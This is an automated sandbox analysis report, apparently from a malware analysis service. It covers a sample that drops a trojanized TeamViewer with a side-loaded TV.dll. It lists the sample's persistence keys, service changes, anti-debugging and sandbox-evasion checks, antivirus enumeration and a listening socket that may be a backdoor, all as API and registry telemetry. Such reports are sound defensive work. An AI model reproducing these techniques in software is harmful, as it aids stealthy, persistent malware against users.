Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 19_3_026C9888 push eax; ret 19_3_026C988F
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 19_3_026C9D08 push esp; ret 19_3_026C9D10
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 20_3_02813210 push eax; retf 20_3_02813211
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 20_3_027DFBC7 push es; retf 20_3_027DFBCA
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 20_3_027B6650 push cs; retf 20_3_027B6652
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 20_3_027B6A3C push es; ret 20_3_027B6A3E
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 20_3_027B7732 push esi; iretd 20_3_027B7752
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 20_3_027B770F push ss; ret 20_3_027B7712
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress, 1_2_00405E88

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File created: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File created: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF44D0 FrostCrashedWindow,InvertRect,FrostCrashedWindow,InvertRect,GetPrivateProfileIntA,InvertRect,InvertRect,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,InvertRect,InvertRect,InvertRect,wsprintfA,InvertRect,InvertRect,wsprintfA,InvertRect,InvertRect,wsprintfA,InvertRect,InvertRect,InvertRect,InvertRect,FrostCrashedWindow,InvertRect,FrostCrashedWindow,InvertRect,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree, 3_2_6EAF44D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_004E177C __EH_prolog3,GetModuleFileNameW,PathRemoveFileSpecW,_wcscat_s,_memset,GetPrivateProfileStringW, 6_2_004E177C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAF44D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree, 6_2_6EAF44D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAF44D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree, 8_2_6EAF44D0

Boot Survival:

Creates or modifies windows services
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\USBManager\Parameters
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF37D0 QueryServiceConfigA,QueryServiceConfigA,GetProcessHeap,HeapAlloc,QueryServiceConfigA,ChangeServiceConfigA,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceA, 3_2_6EAF37D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_004FB7F9 6_2_004FB7F9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_004DC9D6 6_2_004DC9D6
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_00500C6A 6_2_00500C6A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_004FFF68 6_2_004FFF68
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 4668 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 3100 Thread sleep count: 99 > 30
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 3100 Thread sleep time: -49500s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 3_2_6EAFB0A0
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_004FFF68 6_2_004FFF68
Contains functionality to query network adapter information
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: __EH_prolog3,GetAdaptersInfo,_malloc,GetAdaptersInfo, 6_2_004B9A29
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: GetAdaptersInfo, 6_2_6EAF82F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00405E61 FindFirstFileA,FindClose, 1_2_00405E61
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_0040263E FindFirstFileA, 1_2_0040263E
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 1_2_0040548B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose, 3_2_6EAF28B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose, 3_2_6EAF2DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW, 6_2_004BF3A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose, 6_2_0050331C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose, 6_2_6EAF2DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose, 6_2_6EAF28B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose, 8_2_6EAF28B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose, 8_2_6EAF2DF0
Source: svchost.exe, 00000005.00000002.524751408.000002B018262000.00000004.00000001.sdmp Binary or memory string: $@Hyper-V RAW
Source: svchost.exe, 00000005.00000002.510529267.000002B012C29000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.281567558.0000000000BB8000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000009.00000002.509723909.000001E20B602000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000009.00000002.510137559.000001E20B640000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.510538467.000001D426444000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.510416688.0000024BA4E29000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging:

Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Open window title or class name: ollydbg
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe System information queried: CodeIntegrityInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_0053496B
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 3_2_6EAFB0A0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress, 1_2_00405E88
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF2000 GetSecurityInfo,GetNamedSecurityInfoA,GetProcessHeap,HeapAlloc,CreateWellKnownSid,SetEntriesInAclA,SetSecurityInfo,SetNamedSecurityInfoA,GetProcessHeap,HeapFree, 3_2_6EAF2000
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAFC1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6EAFC1E2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_0051523A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_0051523A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_0053496B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_00534A9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00534A9B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAFC1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6EAFC1E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAFC1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_6EAFC1E2

HIPS / PFW / Operating System Protection Evasion:

DLL side loading technique detected
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF5130 LogonUserW,GetLastError,CloseHandle, 3_2_6EAF5130
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF3390 OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GetProcessHeap,GetProcessHeap,HeapAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,ConvertSidToStringSidA,FreeSid,GetProcessHeap,HeapFree,CloseHandle, 3_2_6EAF3390
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmp Binary or memory string: Progman
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWndThumbnailClassDV2ControlHostBaseBarTeamViewer_TitleBarWindowProgmanTVWidgetWin#32771teamviewerdebug.exeteamviewer.exeQuick Connect ButtonStartmenuTaskbarDesktopsidebar.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileDescription.exeOther applicationsSideBar_HTMLHostWindowSideBar_AppBarBulletBasicWindowTVWhiteboardOverlayWindowButtonEnableApplicationSelection: %1% (..\Server\WindowOberserver.cpp, 720)SelectAllWindows: %1%;%2% (..\Server\WindowOberserver.cpp, 751)SetSingleWindow (..\Server\WindowOberserver.cpp, 820)SessionEnded: %1% (..\Server\WindowOberserver.cpp, 827)SessionStart: %1%; type: %2% (..\Server\WindowOberserver.cpp, 910)HandleDesktopChanged: %1% (..\Server\WindowOberserver.cpp, 1017)Winlogonmap/set<T> too long

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Queries volume information: C:\ VolumeInformation
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,InvertRect,InvertRect,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,FrostCrashedWindow,FrostCrashedWindow,GetPrivateProfileIntA,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree, 3_2_6EAF6D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: GetLocaleInfoA,_xtoa_s@20, 6_2_0054113A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: GetLocaleInfoA, 6_2_0054E79D
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: _LcidFromHexString,GetLocaleInfoA, 6_2_0054E87F
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen, 6_2_0054E915
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: GetLocaleInfoA, 6_2_0054D9D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 6_2_0054E987
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 6_2_0054EB57
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 6_2_0054EC7B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 6_2_0054EC16
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 6_2_0054ECB7
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree, 6_2_6EAF6D50
Source: C:\Windows\SysWOW64\svchost.exe Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,DestroyAcceleratorTable,DestroyAcceleratorTable,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,DestroyAcceleratorTable,DestroyAcceleratorTable,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree, 8_2_6EAF6D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0054B459 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 3_2_0054B459
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDList,753CA680,lstrcat,lstrlen, 1_2_00405B88
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,FrostCrashedWindow,FrostCrashedWindow,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FrostCrashedWindow,FrostCrashedWindow,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,InvertRect,InvertRect,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 3_2_6EAF8510

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
AV process strings found (often used to terminate AV products)
Source: svchost.exe, 0000000E.00000002.510485370.000001B2F323D000.00000004.00000001.sdmp Binary or memory string: "@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.510602015.000001B2F3302000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_00511D6F __EH_prolog3_catch,_memset,_memset,socket,WSAGetLastError,htonl,inet_addr,htons,WSAGetLastError,bind,bind,WSAGetLastError,Sleep,bind,listen,WSAGetLastError,select,WSAGetLastError,getsockname,WSAGetLastError,Sleep,__WSAFDIsSet,accept,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,WSAGetLastError,Sleep,GetTickCount,__WSAFDIsSet,WSAGetLastError,_strncmp,_strncmp,_strncpy,shutdown,Sleep,listen,Sleep,listen,WSAGetLastError,accept,Sleep,_memset,WSAGetLastError,_memset,select,_strncmp, 6_2_00511D6F